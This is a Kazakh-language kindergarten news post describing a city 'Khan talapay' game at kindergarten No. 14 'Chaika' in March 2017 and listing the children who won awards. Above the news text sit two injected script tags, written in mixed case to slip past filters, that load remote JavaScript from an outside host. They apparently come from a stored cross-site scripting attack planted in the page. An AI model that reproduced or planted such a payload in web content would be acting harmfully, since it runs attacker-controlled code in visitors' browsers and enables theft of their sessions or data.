<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.03.2017

№14  «Чайка» балабақшасында  қалалық «Хан талапай» ойыны өтті. Сайысқа №12 тобының балалары қатысты.Ойын сахналық көрініс ретінде тартымды болды.  Зал ұлттық тақырыпта безендірілген. Ойынды тәжірибелі ұстаз-дене шынықтыру нұсқаушысы Раушан Жасұлановна  Жакупова жүргізді. Ертегі кейіпкері Алдар-көсе болып, ол балаларда ойынға деген қызығушылықты оятты. Балалар ойын кезінде жеңіске жету үшін  өздерінің тапқырлығын, логикасын,  мергенділіктерін, ептіліктерін, жылдам шешім қабылдай алатын талаптарын көрсете білді. Ойын нәтижесінде «Мерген бала » номинациясында Жарас Алдияр алды, «Алғыр бала» номинациясында Шопагулов Ербол, ал «Зерек бала» Жұмабек Кемел алды.

 

 

Просмотров: 557


Пікір қосу



Деректерді қолтаңбаға қосу